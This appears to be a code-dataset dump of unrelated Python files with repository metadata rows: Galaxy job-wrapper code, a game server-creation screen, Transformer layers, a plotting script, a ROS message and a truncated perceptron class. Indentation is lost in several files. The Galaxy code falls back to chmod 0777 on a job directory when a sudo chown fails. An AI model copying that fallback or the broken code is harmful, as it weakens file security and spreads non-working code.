dataset_path = DatasetPath( da.dataset.dataset.id, da.dataset.file_name, false_path=da_false_path, mutable=mutable )
results.append( ( da.name, da.dataset, dataset_path ) )
self.output_paths = [t[2] for t in results]
self.output_hdas_and_paths = dict([(t[0], t[1:]) for t in results])
if special:
false_path = dataset_path_rewriter.rewrite_dataset_path( special.dataset, 'output' )
dsp = DatasetPath( special.dataset.id, special.dataset.file_name, false_path )
self.output_paths.append( dsp )
return self.output_paths
def get_output_file_id( self, file ):
if self.output_paths is None:
self.get_output_fnames()
for dp in self.output_paths:
if self.app.config.outputs_to_working_directory and os.path.basename( dp.false_path ) == file:
return dp.dataset_id
elif os.path.basename( dp.real_path ) == file:
return dp.dataset_id
return None
def get_tool_provided_job_metadata( self ):
if self.tool_provided_job_metadata is not None:
return self.tool_provided_job_metadata
# Look for JSONified job metadata
self.tool_provided_job_metadata = []
meta_file = os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE )
if os.path.exists( meta_file ):
for line in open( meta_file, 'r' ):
try:
line = from_json_string( line )
assert 'type' in line
except:
log.exception( '(%s) Got JSON data from tool, but data is improperly formatted or no "type" key in data' % self.job_id )
log.debug( 'Offending data was: %s' % line )
continue
# Set the dataset id if it's a dataset entry and isn't set.
# This isn't insecure. We loop the job's output datasets in
# the finish method, so if a tool writes out metadata for a
# dataset id that it doesn't own, it'll just be ignored.
if line['type'] == 'dataset' and 'dataset_id' not in line:
try:
line['dataset_id'] = self.get_output_file_id( line['dataset'] )
except KeyError:
log.warning( '(%s) Tool provided job dataset-specific metadata without specifying a dataset' % self.job_id )
continue
self.tool_provided_job_metadata.append( line )
return self.tool_provided_job_metadata
def get_dataset_finish_context( self, job_context, dataset ):
for meta in self.get_tool_provided_job_metadata():
if meta['type'] == 'dataset' and meta['dataset_id'] == dataset.id:
return ExpressionContext( meta, job_context )
return job_context
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# extension could still be 'auto' if this is the upload tool.
job = self.get_job()
if set_extension:
for output_dataset_assoc in job.output_datasets:
if output_dataset_assoc.dataset.ext == 'auto':
context = self.get_dataset_finish_context( dict(), output_dataset_assoc.dataset.dataset )
output_dataset_assoc.dataset.extension = context.get( 'ext', 'data' )
self.sa_session.flush()
if tmp_dir is None:
            # this dir should be relative to the exec_dir
tmp_dir = self.app.config.new_file_path
if dataset_files_path is None:
dataset_files_path = self.app.model.Dataset.file_path
if config_root is None:
config_root = self.app.config.root
if config_file is None:
config_file = self.app.config.config_file
if datatypes_config is None:
datatypes_config = self.app.datatypes_registry.integrated_datatypes_configs
return self.external_output_metadata.setup_external_metadata( [ output_dataset_assoc.dataset for output_dataset_assoc in job.output_datasets + job.output_library_datasets ],
self.sa_session,
exec_dir=exec_dir,
tmp_dir=tmp_dir,
dataset_files_path=dataset_files_path,
config_root=config_root,
config_file=config_file,
datatypes_config=datatypes_config,
job_metadata=os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE ),
**kwds )
@property
def user( self ):
job = self.get_job()
if job.user is not None:
return job.user.email
elif job.galaxy_session is not None and job.galaxy_session.user is not None:
return job.galaxy_session.user.email
elif job.history is not None and job.history.user is not None:
return job.history.user.email
elif job.galaxy_session is not None:
return 'anonymous@' + job.galaxy_session.remote_addr.split()[-1]
else:
return 'anonymous@unknown'
def __link_file_check( self ):
""" outputs_to_working_directory breaks library uploads where data is
linked. This method is a hack that solves that problem, but is
specific to the upload tool and relies on an injected job param. This
method should be removed ASAP and replaced with some properly generic
and stateful way of determining link-only datasets. -nate
"""
job = self.get_job()
param_dict = job.get_param_values( self.app )
return self.tool.id == 'upload1' and param_dict.get( 'link_data_only', None ) == 'link_to_files'
def _change_ownership( self, username, gid ):
job = self.get_job()
# FIXME: hardcoded path
cmd = [ '/usr/bin/sudo', '-E', self.app.config.external_chown_script, self.working_directory, username, str( gid ) ]
log.debug( '(%s) Changing ownership of working directory with: %s' % ( job.id, ' '.join( cmd ) ) )
p = subprocess.Popen( cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE )
# TODO: log stdout/stderr
stdout, stderr = p.communicate()
assert p.returncode == 0
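    # The command assembled above is roughly (script path and arguments are
    # site-specific):
    #   /usr/bin/sudo -E <external_chown_script> <working_directory> <username> <gid>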
def change_ownership_for_run( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
try:
self._change_ownership( self.user_system_pwent[0], str( self.user_system_pwent[3] ) )
except:
log.exception( '(%s) Failed to change ownership of %s, making world-writable instead' % ( job.id, self.working_directory ) )
os.chmod( self.working_directory, 0777 )
def reclaim_ownership( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
self._change_ownership( self.galaxy_system_pwent[0], str( self.galaxy_system_pwent[3] ) )
@property
def user_system_pwent( self ):
if self.__user_system_pwent is None:
job = self.get_job()
try:
self.__user_system_pwent = pwd.getpwnam( job.user.email.split('@')[0] )
except:
pass
return self.__user_system_pwent
@property
def galaxy_system_pwent( self ):
if self.__galaxy_system_pwent is None:
self.__galaxy_system_pwent = pwd.getpwuid(os.getuid())
return self.__galaxy_system_pwent
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. This is the normal case,
        just copy these files directly to the ultimate destination.
"""
return output_path
@property
def requires_setting_metadata( self ):
if self.tool:
return self.tool.requires_setting_metadata
return False
class TaskWrapper(JobWrapper):
"""
Extension of JobWrapper intended for running tasks.
    Should be refactored into a generalized executable-unit wrapper parent, with jobs and tasks as subclasses.
"""
# Abstract this to be more useful for running tasks that *don't* necessarily compose a job.
def __init__(self, task, queue):
super(TaskWrapper, self).__init__(task.job, queue)
self.task_id = task.id
working_directory = task.working_directory
self.working_directory = working_directory
job_dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.dataset_path_rewriter = TaskPathRewriter( working_directory, job_dataset_path_rewriter )
if task.prepare_input_files_cmd is not None:
self.prepare_input_files_cmds = [ task.prepare_input_files_cmd ]
else:
self.prepare_input_files_cmds = None
self.status = task.states.NEW
def can_split( self ):
# Should the job handler split this job up? TaskWrapper should
# always return False as the job has already been split.
return False
def get_job( self ):
if self.job_id:
return self.sa_session.query( model.Job ).get( self.job_id )
else:
return None
def get_task( self ):
return self.sa_session.query(model.Task).get(self.task_id)
def get_id_tag(self):
# For compatibility with drmaa job runner and TaskWrapper, instead of using job_id directly
return self.get_task().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.sa_session.query( model.Job ).get( self.job_id )
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
# Restore parameters from the database
job = self._load_job()
task = self.get_task()
# DBTODO New method for generating command line for a task?
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
if self.command_line and self.command_line.startswith( 'python' ):
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
task.command_line = self.command_line
self.sa_session.add( task )
self.sa_session.flush()
self.param_dict = tool_evaluator.param_dict
self.status = 'prepared'
return self.extra_filenames
def fail( self, message, exception=False ):
log.error("TaskWrapper Failure %s" % message)
self.status = 'error'
# How do we want to handle task failure? Fail the job and let it clean up?
def change_state( self, state, info=False ):
task = self.get_task()
self.sa_session.refresh( task )
if info:
task.info = info
task.state = state
self.sa_session.add( task )
self.sa_session.flush()
def get_state( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.state
def get_exit_code( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.exit_code
def set_runner( self, runner_url, external_id ):
task = self.get_task()
self.sa_session.refresh( task )
task.task_runner_name = runner_url
task.task_runner_external_id = external_id
# DBTODO Check task job_runner_stuff
self.sa_session.add( task )
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None ):
# DBTODO integrate previous finish logic.
# Simple finish for tasks. Just set the flag OK.
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# This may have ended too soon
log.debug( 'task %s for job %d ended; exit code: %d'
% (self.task_id, self.job_id,
tool_exit_code if tool_exit_code != None else -256 ) )
        # default post job setup
self.sa_session.expunge_all()
task = self.get_task()
# if the job was deleted, don't finish it
if task.state == task.states.DELETED:
# Job was deleted by an administrator
delete_files = self.app.config.cleanup_job in ( 'always', 'onsuccess' )
self.cleanup( delete_files=delete_files )
return
elif task.state == task.states.ERROR:
self.fail( task.info )
return
# Check what the tool returned. If the stdout or stderr matched
# regular expressions that indicate errors, then set an error.
# The same goes if the tool's exit code was in a given range.
if ( self.check_tool_output( stdout, stderr, tool_exit_code, task ) ):
task.state = task.states.OK
else:
task.state = task.states.ERROR
# Save stdout and stderr
if len( stdout ) > DATABASE_MAX_STRING_SIZE:
log.error( "stdout for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
task.stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( stderr ) > DATABASE_MAX_STRING_SIZE:
log.error( "stderr for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
self._collect_metrics( task )
task.stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
task.exit_code = tool_exit_code
task.command_line = self.command_line
self.sa_session.flush()
    def cleanup( self, delete_files=False ):
        # There is no task cleanup. The job cleans up for all tasks.
        # delete_files is accepted (and ignored) so the finish() call above,
        # which passes delete_files=..., does not raise a TypeError.
        pass
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_output_file_id( self, file ):
# There is no permanent output file for tasks.
return None
def get_tool_provided_job_metadata( self ):
# DBTODO Handle this as applicable for tasks.
return None
def get_dataset_finish_context( self, job_context, dataset ):
# Handled at the parent job level. Do nothing here.
pass
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# There is no metadata setting for tasks. This is handled after the merge, at the job level.
return ""
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. These must be copied with
        the same basename as the path for the ultimate output destination. This is
required in the task case so they can be merged.
"""
return os.path.join( self.working_directory, os.path.basename( output_path ) )
class ComputeEnvironment( object ):
""" Definition of the job as it will be run on the (potentially) remote
compute server.
"""
__metaclass__ = ABCMeta
@abstractmethod
def output_paths( self ):
""" Output DatasetPaths defined by job. """
@abstractmethod
def input_paths( self ):
""" Input DatasetPaths defined by job. """
@abstractmethod
def working_directory( self ):
""" Job working directory (potentially remote) """
@abstractmethod
def config_directory( self ):
""" Directory containing config files (potentially remote) """
@abstractmethod
def sep( self ):
""" os.path.sep for the platform this job will execute in.
"""
@abstractmethod
def new_file_path( self ):
""" Location to dump new files for this job on remote server. """
@abstractmethod
def version_path( self ):
""" Location of the version file for the underlying tool. """
@abstractmethod
def unstructured_path_rewriter( self ):
""" Return a function that takes in a value, determines if it is path
to be rewritten (will be passed non-path values as well - onus is on
this function to determine both if its input is a path and if it should
be rewritten.)
"""
class SimpleComputeEnvironment( object ):
def config_directory( self ):
return self.working_directory( )
def sep( self ):
return os.path.sep
def unstructured_path_rewriter( self ):
return lambda v: v
class SharedComputeEnvironment( SimpleComputeEnvironment ):
""" Default ComputeEnviornment for job and task wrapper to pass
to ToolEvaluator - valid when Galaxy and compute share all the relevant
file systems.
"""
def __init__( self, job_wrapper, job ):
self.app = job_wrapper.app
self.job_wrapper = job_wrapper
self.job = job
def output_paths( self ):
return self.job_wrapper.get_output_fnames()
def input_paths( self ):
return self.job_wrapper.get_input_paths( self.job )
def working_directory( self ):
return self.job_wrapper.working_directory
def new_file_path( self ):
return os.path.abspath( self.app.config.new_file_path )
def version_path( self ):
return self.job_wrapper.get_version_string_path()
class NoopQueue( object ):
"""
Implements the JobQueue / JobStopQueue interface but does nothing
"""
def put( self, *args, **kwargs ):
return
def put_stop( self, *args ):
return
def shutdown( self ):
return
class ParallelismInfo(object):
"""
Stores the information (if any) for running multiple instances of the tool in parallel
on the same set of inputs.
"""
def __init__(self, tag):
self.method = tag.get('method')
if isinstance(tag, dict):
items = tag.iteritems()
else:
items = tag.attrib.items()
self.attributes = dict( [ item for item in items if item[ 0 ] != 'method' ])
if len(self.attributes) == 0:
# legacy basic mode - provide compatible defaults
self.attributes['split_size'] = 20
self.attributes['split_mode'] = 'number_of_parts'
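# Illustrative example (not part of the original module): a tag that carries only a
# method falls back to the legacy defaults assigned above, e.g.
#   info = ParallelismInfo({'method': 'basic'})
#   info.method      -> 'basic'
#   info.attributes  -> {'split_size': 20, 'split_mode': 'number_of_parts'}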
|
[
"sokratiskariotis@gmail.com"
] |
sokratiskariotis@gmail.com
|
8fa6fd693effe0a2e6b5bc5ceffffc3a0bc356d1
|
fc913f9b19c5409e5cef4d0276863d4229d0637c
|
/states/CreateServerState.py
|
8ef507d86920bbc4298e5b8e907249f8abb2972b
|
[] |
no_license
|
ThatsAMorais/breakin-and-poppin
|
6af7e53395f45e47aa0e3c36a5868eca962b2aa0
|
dd6c4e39e9e5af7109c26b51c24607099c3a3b98
|
refs/heads/master
| 2021-01-06T20:37:18.303481
| 2018-08-20T06:36:49
| 2018-08-20T06:36:49
| 7,364,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,984
|
py
|
##### File : CreateServerState.py
#### Author : Alex Morais
### Description :
##
# Standard-library imports needed by on_mouse below (os.path.join, system() and
# Popen are used there but were never imported explicitly in this file).
import os
from platform import system
from subprocess import Popen

from states.EngineState import *
from states.TitleScreenState import *
from states.ChoosePlayerState import *
from ui.Font import *
from ui.UIText import *
from ui.UIImage import *
class CreateServerState(EngineState):
def __init__(self, engine):
"""
The game determines what is happening on screen
based on what state the GameEngine instance has.
"""
self.engine = engine
self.screen = Screen()
self.res = self.engine.setsMgr.screenRes
res = self.res # saying 'self.res' was making lines too long. :P
# get/load the font
self.font = FontManager().loadFont( 'JohnDoe' )
# screen objects
self.UI = {}
self.UI['title'] = UIText("Start a Server"\
, pos=[res[0]*.01,res[1]*.10], font=self.font, scale=35)
self.UI['server_name'] = UIText("Server Name"\
, [res[0]*0.3, res[1]*0.2], self.font, 22)
self.UI['text_entry'] = UIText("server_name"\
, [res[0]*0.3, res[1]*0.4], self.font, 30)
self.UI['backspace'] = UIText("BKSP"\
, [res[0]*0.3, res[1]*0.50], self.font, 20)
self.UI['space'] = UIText("SPACE"\
, [res[0]*0.3, res[1]*0.7], self.font, 20)
self.UI['back'] = UIText("Back"\
, pos=[res[0]*0.15, res[1]*0.8], font=self.font, scale=20)
self.UI['create'] = UIText("Create"\
, pos=[res[0]*0.7, res[1]*0.8], font=self.font, scale=20)
# Here, a hash is created containing a UIText for each letter in the alphabet.
# They are spaced and stacked on the screen so that they lie in 3 rows of 8,
# 9, and 9 letters each.
self.screenKeys = {}
lettPos = [res[0]*0.20, res[1]*0.6]
lettersToAdd = 8
lettScale = 18
for letter in map(chr, range(65, 91)):
# add the letter to the hash
self.screenKeys[letter] = UIText(letter, [lettPos[0], lettPos[1]],
self.font, lettScale)
# This denotes that the last letter in the row has been added
#
if lettersToAdd == 1:
lettersToAdd = 9 # the subsequent rows all have 9 letters
lettPos[0] = res[0]*0.17 # reset the x pos (slightly less ^\ )
lettPos[1] += lettScale+1 # increment the y pos
else:
lettersToAdd -= 1 # decrement the counter
lettPos[0] += lettScale+1 # increment the x pos
def renderFrame(self):
""" RenderFrame - Base Class """
#screen = Screen()
for scrObj in self.UI.values():
Screen().drawThis( scrObj )
for letter in self.screenKeys.values():
Screen().drawThis( letter )
return self
def on_key_press(self, key, x, y):
"""
On key press
"""
print key
if key == '\x1b':
return TitleScreenState(self.engine)
return self
def on_key_release(self, key, x, y):
"""
On key release
"""
return self
def on_mouse_motion(self, x, y):
"""
On mouse motion
"""
return self
def on_mouse(self, button, state, x, y):
"""
On mouse press
"""
if button == GLUT_LEFT_BUTTON and state == GLUT_UP:
if self.UI['back'].CollidePoint((x,y)):
return TitleScreenState(self.engine)
if self.UI['create'].CollidePoint((x,y)):
if system() == "Linux" or system() == "Macintosh":
Popen( [r'/usr/bin/python/python'
,os.path.join( self.engine.setsMgr.home_dir
, 'StartServer.py' )] )
elif system() == "Windows":
Popen([r'C:\Python25\python.exe'
,os.path.join( self.engine.setsMgr.home_dir
, 'StartServer.py' )])
else:
print "you are on an unsupported platform for spawning a server"
# declare that this game instance is the server owner
self.engine.serverOwner = True
# test for user clicks on the screen keys
for letter in self.screenKeys:
if self.screenKeys[letter].CollidePoint((x,y)):
self.UI['text_entry'].push( letter )
if self.UI['backspace'].CollidePoint((x,y)):
self.UI['text_entry'].pop()
if self.UI['space'].CollidePoint((x,y)):
self.UI['text_entry'].push(" ")
return self
def on_socket(self, elapsed):
"""
On socket
"""
return self
def Step(self):
"""
Step
"""
pass
|
[
"thatsamorais@mail.com"
] |
thatsamorais@mail.com
|
8a50e6af62d2494ac3fcea05f063f3807d33eba5
|
4758708f1655f795075669e9a0fdf84041592548
|
/Layers.py
|
a70c1a2a0ce27760d34f327073fdb849ed5c7541
|
[
"Apache-2.0"
] |
permissive
|
SamLynnEvans/Transformer
|
4a6a009c3544ea2a14e320f48cd38d6f00e86944
|
49e01800aab01dcd83403a056c059f429a7d7512
|
refs/heads/master
| 2023-05-25T20:04:07.244922
| 2023-05-19T10:22:41
| 2023-05-19T10:22:41
| 149,262,160
| 1,236
| 381
|
Apache-2.0
| 2023-05-19T10:22:43
| 2018-09-18T09:25:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,741
|
py
|
import torch
import torch.nn as nn
from Sublayers import FeedForward, MultiHeadAttention, Norm
class EncoderLayer(nn.Module):
def __init__(self, d_model, heads, dropout=0.1):
super().__init__()
self.norm_1 = Norm(d_model)
self.norm_2 = Norm(d_model)
self.attn = MultiHeadAttention(heads, d_model, dropout=dropout)
self.ff = FeedForward(d_model, dropout=dropout)
self.dropout_1 = nn.Dropout(dropout)
self.dropout_2 = nn.Dropout(dropout)
def forward(self, x, mask):
x2 = self.norm_1(x)
x = x + self.dropout_1(self.attn(x2,x2,x2,mask))
x2 = self.norm_2(x)
x = x + self.dropout_2(self.ff(x2))
return x
# build a decoder layer with two multi-head attention layers and
# one feed-forward layer
class DecoderLayer(nn.Module):
def __init__(self, d_model, heads, dropout=0.1):
super().__init__()
self.norm_1 = Norm(d_model)
self.norm_2 = Norm(d_model)
self.norm_3 = Norm(d_model)
self.dropout_1 = nn.Dropout(dropout)
self.dropout_2 = nn.Dropout(dropout)
self.dropout_3 = nn.Dropout(dropout)
self.attn_1 = MultiHeadAttention(heads, d_model, dropout=dropout)
self.attn_2 = MultiHeadAttention(heads, d_model, dropout=dropout)
self.ff = FeedForward(d_model, dropout=dropout)
def forward(self, x, e_outputs, src_mask, trg_mask):
x2 = self.norm_1(x)
x = x + self.dropout_1(self.attn_1(x2, x2, x2, trg_mask))
x2 = self.norm_2(x)
x = x + self.dropout_2(self.attn_2(x2, e_outputs, e_outputs, \
src_mask))
x2 = self.norm_3(x)
x = x + self.dropout_3(self.ff(x2))
return x
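

# Quick shape check (illustrative sizes; relies on the repo's own Sublayers module
# imported at the top of this file).
if __name__ == "__main__":
    d_model, heads, batch, seq_len = 512, 8, 2, 10
    layer = EncoderLayer(d_model, heads)
    x = torch.rand(batch, seq_len, d_model)
    mask = torch.ones(batch, 1, seq_len)
    print(layer(x, mask).shape)  # expected: torch.Size([2, 10, 512])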
|
[
"samuellynnevans@gmail.com"
] |
samuellynnevans@gmail.com
|
af83b8df9d6ed2c308afc29ae1eb3741fdd3ba6e
|
efa88ab827502ecf7143d8564839cce9945987b3
|
/comparison/plotter/plot_single_method.py
|
6900e44609a9a3f2b22a58f104a1f28fcc51690a
|
[
"MIT"
] |
permissive
|
morrislab/pairtree
|
678bf2b2c2fdb06900e03de4cea2d1ef5e08f641
|
1e01dc9ccbd15146de9184bd9d7b5d690cf0fd89
|
refs/heads/master
| 2023-07-27T11:42:37.237423
| 2023-07-18T00:05:43
| 2023-07-18T00:05:43
| 140,898,706
| 32
| 11
|
MIT
| 2023-03-02T21:45:51
| 2018-07-13T22:41:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,213
|
py
|
import argparse
import numpy as np
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import plotter
from plotter import MISSING
import pandas as pd
def make_score_traces(results, method):
S_vals = sorted(pd.unique(results['S']))
traces = []
for S in S_vals:
points = [(row['K'], row[method]) for idx, row in results.iterrows() \
if row[method] != MISSING and row['S'] == S]
if len(points) == 0:
continue
points = sorted(points, key = lambda V: V[0])
X, Y = zip(*points)
X = ['%s subclones' % K for K in X]
trace = {
'type': 'box',
'x': X,
'y': Y,
'legendgroup': str(S),
'name': '%s samples' % S,
'boxmean': True,
}
traces.append(trace)
return traces
def make_completion_traces(results, method):
S_vals = sorted(pd.unique(results['S']))
K_vals = sorted(pd.unique(results['K']))
traces = []
for S in S_vals:
prop_missing = {}
for K in K_vals:
total = len([
row for idx, row in results.iterrows() \
if row['K'] == K \
and row['S'] == S
])
if total == 0:
continue
complete = len([
row for idx, row in results.iterrows() \
if row[method] != MISSING \
and row['K'] == K \
and row['S'] == S
])
missing = total - complete
prop_missing[K] = missing / total
if len(prop_missing) == 0:
continue
K_sorted = sorted(prop_missing.keys())
X = ['%s subclones' % K for K in K_sorted]
Y = [100*prop_missing[k] for k in K_sorted]
traces.append({
'type': 'bar',
'x': X,
'y': Y,
'name': '%s samples' % S,
})
return traces
def main():
parser = argparse.ArgumentParser(
description='LOL HI THERE',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--template', default='seaborn')
parser.add_argument('--max-y')
parser.add_argument('--score-type', required=True, choices=('mutrel', 'mutphi', 'mutdistl1', 'mutdistl2'))
parser.add_argument('--baseline')
parser.add_argument('results_fn')
parser.add_argument('method')
parser.add_argument('plot_fn')
args = parser.parse_args()
results, methods = plotter.load_results(args.results_fn)
plot_type = 'box'
plotter.munge(results, methods, args.baseline)
for key in ('K', 'S'):
results = plotter.augment(results, key)
score_traces = make_score_traces(results, args.method)
completion_traces = make_completion_traces(results, args.method)
figs = {
f'scores_{args.method}': plotter.make_fig(
score_traces,
args.template,
plotter.make_score_ytitle(args.score_type, args.plot_fn),
args.max_y,
log_y_axis = False,
layout_options = {
'boxmode': 'group',
'violinmode': 'overlay',
'violingap': 0.0,
'violingroupgap': 0.0,
},
),
f'completion_{args.method}': plotter.make_fig(
completion_traces,
args.template,
'Failure rate',
100,
log_y_axis = False,
layout_options = {
'barmode': 'group',
},
),
}
plotter.write_figs(figs, args.plot_fn)
if __name__ == '__main__':
main()
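
# Example invocation (hypothetical file and method names):
#   python plot_single_method.py --score-type mutphi results.csv pairtree scores.html
# This writes one grouped box plot of scores and one failure-rate bar chart for the
# chosen method via plotter.write_figs.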
|
[
"jeff.git@wintersinger.com"
] |
jeff.git@wintersinger.com
|
7f8c820fb39fbccf368636870997d3dc022fec49
|
194db7eb2ffb075712832a55eeecfcbbb6c05def
|
/devel/lib/python2.7/dist-packages/melle/msg/_SensorData.py
|
c68f7448e09bc1f8eb01fa5c8a03ef4179e035a5
|
[] |
no_license
|
LitterBot2017/MellERos
|
ef7acd720ab0cf60165f64b079eaf3009c492366
|
0fc6af1d21b9e4716fd0efaaadf39aa62a53220b
|
refs/heads/master
| 2020-01-23T21:43:48.445142
| 2016-11-24T15:12:15
| 2016-11-24T15:12:15
| 74,683,802
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,239
|
py
|
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from melle/SensorData.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SensorData(genpy.Message):
_md5sum = "ac7363d784144c7402ac7de3955b5772"
_type = "melle/SensorData"
_has_header = False #flag to mark the presence of a Header object
_full_text = """int8 binFullness
int8 batteryLevel
int8 signalStrength
float64 latitude
float64 longitude
"""
__slots__ = ['binFullness','batteryLevel','signalStrength','latitude','longitude']
_slot_types = ['int8','int8','int8','float64','float64']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
binFullness,batteryLevel,signalStrength,latitude,longitude
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SensorData, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.binFullness is None:
self.binFullness = 0
if self.batteryLevel is None:
self.batteryLevel = 0
if self.signalStrength is None:
self.signalStrength = 0
if self.latitude is None:
self.latitude = 0.
if self.longitude is None:
self.longitude = 0.
else:
self.binFullness = 0
self.batteryLevel = 0
self.signalStrength = 0
self.latitude = 0.
self.longitude = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_3b2d.pack(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 19
(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude,) = _struct_3b2d.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3b2d.pack(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 19
(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude,) = _struct_3b2d.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3b2d = struct.Struct("<3b2d")
|
[
"nrahnemoon@gmail.com"
] |
nrahnemoon@gmail.com
|
4c208fd5282b81d62de3cd7ac8fcd3f13139fd78
|
02adeee0e6b0457fa3dc171a96d7dae9558d8047
|
/pocket-learning-algorithm-and-feature-engineering/perceptron_classifier.py
|
dfa58c902dc0c0650e6f4c250e83e5c5601e0e16
|
[
"Apache-2.0"
] |
permissive
|
pfvaldez/blog-post
|
7d19456ad03984e4729f19bb075efdcf10ca18d3
|
ab159bb44ed57e73c7467197f7adec6e30b4dbc0
|
refs/heads/master
| 2020-04-04T13:12:07.636645
| 2018-02-13T04:03:36
| 2018-02-13T04:03:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,139
|
py
|
import numpy as np
class PerceptronClassifier:
    '''Perceptron Binary Classifier uses the Perceptron Learning Algorithm
to classify two classes data.
Parameters
----------
number_of_attributes: int
The number of attributes of the data set.
class_labels: tuple of the class labels
The class labels can be anything as long as it has only two types of labels.
Attributes
----------
weights: list of float
The list of weights corresponding input attributes.
misclassify_record: list of int
The number of misclassification for each training sample.
'''
def __init__(self, number_of_attributes: int, class_labels: ()):
# Initialize the weights to zero
# The size is the number of attributes plus the bias, i.e. x_0 * w_0
self.weights = np.zeros(number_of_attributes + 1)
# Record of the number of misclassify for each training sample
self.misclassify_record = []
# Build the label map to map the original labels to numerical labels
# For example, ['a', 'b'] -> {0: 'a', 1: 'b'}
self._label_map = {1: class_labels[0], -1: class_labels[1]}
self._reversed_label_map = {class_labels[0]: 1, class_labels[1]: -1}
def _linear_combination(self, sample):
'''linear combination of sample and weights'''
return np.inner(sample, self.weights[1:])
def train(self, samples, labels, max_iterator=10):
'''Train the model
Parameters
----------
samples: two dimensions list
Training data set
labels : list of labels
The class labels of the training data
max_iterator: int
            The maximum number of iterations used to stop the training process
            in case the training data is not converged.
'''
# Transfer the labels to numerical labels
transferred_labels = [self._reversed_label_map[index] for index in labels]
for _ in range(max_iterator):
misclassifies = 0
for sample, target in zip(samples, transferred_labels):
linear_combination = self._linear_combination(sample)
update = target - np.where(linear_combination >= 0.0, 1, -1)
# use numpy.multiply to multiply element-wise
self.weights[1:] += np.multiply(update, sample)
self.weights[0] += update
# record the number of misclassification
